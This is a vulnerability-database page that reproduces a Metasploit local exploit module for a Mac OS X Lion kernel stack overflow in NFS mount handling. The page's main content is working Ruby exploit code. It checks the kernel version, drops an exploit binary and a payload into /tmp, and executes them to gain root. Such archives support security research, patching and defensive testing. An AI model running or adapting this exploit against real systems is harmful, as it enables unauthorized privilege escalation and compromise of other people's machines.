Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mac OS X NFS Mount Privilege Escalation

🗓️ 25 Apr 2014 00:00:00Reported by joevType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

Mac OS X NFS Mount Privilege Escalation exploit leveraging stack overflow vulnerability to escalate privileges affecting Mac OS X Lion Kernel, except xnu-1699.24.8

Code
`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'rex'  
  
class Metasploit3 < Msf::Exploit::Local  
Rank = NormalRanking  
  
include Msf::Post::File  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'Mac OS X NFS Mount Privilege Escalation Exploit',  
'Description' => %q{  
This exploit leverage a stack overflow vulnerability to escalate privileges.  
The vulnerable function nfs_convert_old_nfs_args does not verify the size  
of a user-provided argument before copying it to the stack. As a result by  
passing a large size, a local user can overwrite the stack with arbitrary  
content.  
  
Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Kenzley Alphonse', # discovery and a very well-written exploit  
'joev' # msf module  
],  
'References' =>  
[  
[ 'EDB', '32813' ]  
],  
'Platform' => 'osx',  
'Arch' => [ ARCH_X86_64 ],  
'SessionTypes' => [ 'shell', 'meterpreter' ],  
'Targets' => [  
[ 'Mac OS X 10.7 Lion x64 (Native Payload)',  
{  
'Platform' => 'osx',  
'Arch' => ARCH_X86_64  
}  
]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Apr 11 2014'  
))  
end  
  
def check  
if ver_lt(xnu_ver, "1699.32.7") and xnu_ver.strip != "1699.24.8"  
Exploit::CheckCode::Vulnerable  
else  
Exploit::CheckCode::Safe  
end  
end  
  
def exploit  
osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')  
file = File.join(osx_path, 'nfs_mount_priv_escalation.bin')  
exploit = File.read(file)  
pload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)  
tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"  
payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"  
  
print_status "Writing temp file... #{tmpfile}"  
write_file(tmpfile, exploit)  
register_file_for_cleanup(tmpfile)  
  
print_status "Writing payload file... #{payloadfile}"  
write_file(payloadfile, pload)  
register_file_for_cleanup(payloadfile)  
  
print_status "Executing payload..."  
cmd_exec("chmod +x #{tmpfile}")  
cmd_exec("chmod +x #{payloadfile}")  
cmd_exec("#{tmpfile} #{payloadfile}")  
end  
  
def xnu_ver  
m = cmd_exec("uname -a").match(/xnu-([0-9\.~]*)/)  
m && m[1]  
end  
  
def ver_lt(a, b)  
Gem::Version.new(a.gsub(/~.*?$/,'')) < Gem::Version.new(b.gsub(/~.*?$/,''))  
end  
  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Apr 2014 00:00Current
0.7Low risk
Vulners AI Score0.7
mac os xnfs mountprivilege escalationstack overflow vulnerabilityescalate privilegesxnu-1699.32.7local usermetasploitexploitkernellionx86_64edb32813
28